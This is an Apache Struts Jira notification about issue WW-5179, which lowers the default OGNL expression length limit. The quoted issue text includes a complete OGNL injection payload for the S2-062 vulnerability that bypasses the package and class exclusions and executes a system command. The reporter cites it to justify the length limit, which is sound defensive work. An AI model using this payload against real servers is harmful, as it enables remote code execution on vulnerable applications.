You are viewing a plain text version of this content. The canonical link for it is here.

Posted to issues@struts.apache.org by "ASF subversion and git services (Jira)" <ji...@apache.org> on 2022/05/17 19:00:01 UTC

[jira] [Commented] (WW-5179) Set 'struts.ognl.expressionMaxLength' to 256 by default

    [ https://issues.apache.org/jira/browse/WW-5179?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17538416#comment-17538416 ] 

ASF subversion and git services commented on WW-5179:
-----------------------------------------------------

Commit 3f2518afa802d7ef57597b75c70ffb61de1d011a in struts's branch refs/heads/WW-5179-max-length from Lukasz Lenart
[ https://gitbox.apache.org/repos/asf?p=struts.git;h=3f2518afa ]

WW-5179 Set default value of struts.ognl.expressionMaxLength to 256


> Set 'struts.ognl.expressionMaxLength' to 256 by default
> -------------------------------------------------------
>
>                 Key: WW-5179
>                 URL: https://issues.apache.org/jira/browse/WW-5179
>             Project: Struts 2
>          Issue Type: Improvement
>          Components: Core
>            Reporter: tanli
>            Priority: Major
>             Fix For: 2.6
>
>
> struts.ognl.expressionMaxLength
> default set 400
> i reduce the st062 exp
>  
> %\{(#request.a=#@org.apache.commons.collections.BeanMap@{})+
> (#request.a.setBean(#request.get('struts.valueStack'))==true)+
> (#request.b=#@org.apache.commons.collections.BeanMap@{})+
> (#request.b.setBean(#request.get('a').get('context'))==true)+
> (#request.c=#@org.apache.commons.collections.BeanMap@{})+
> (#request.c.setBean(#request.get('b').get('memberAccess'))==true)+
> (#request.get('c').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
> (#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
> (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(\{'calc'}))}
>  
> it's length is 709, so we default set ognl expression length is 400 could protect our app safe.
>  
> and！
>  
> i think st2 can give a default num: a expression  can have  #  nums limit like 10
>  
> thx



--
This message was sent by Atlassian Jira
(v8.20.7#820007)